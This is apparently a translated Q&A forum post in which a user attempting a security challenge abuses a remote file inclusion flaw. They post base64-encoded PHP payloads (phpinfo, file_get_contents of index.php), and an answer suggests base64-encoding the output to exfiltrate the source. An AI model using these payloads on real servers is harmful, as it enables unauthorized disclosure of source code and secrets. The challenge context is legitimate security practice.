我正在尝试在着名的安全网站上进行挑战!
挑战在于利用远程文件包含漏洞!
我找到了漏洞,我可以让服务器运行php函数!
但不是全部!我不知道为什么!
因此,通过示例,我可以通过编码运行phpinfo();函数:
<?php phpinfo(); ?>
在base64 - Ascii中,这完美无缺,但我的目标是获取php源代码!
但是当我编码时:
<?php file('index.php'); ?>
或
<?php $page = file_get_contents('index.php'); echo $page; ?>
我用来获取错误!就像Parse error: syntax error, unexpected '?'
感谢您的帮助!我认为问题来自输出(当我做“回声”时)
答案 0 :(得分:0)
您可以在发送之前尝试使用base64编码$page。
<?php $page = file_get_contents('index.php'); echo base64_encode($page); ?>
然后在您的计算机上解码。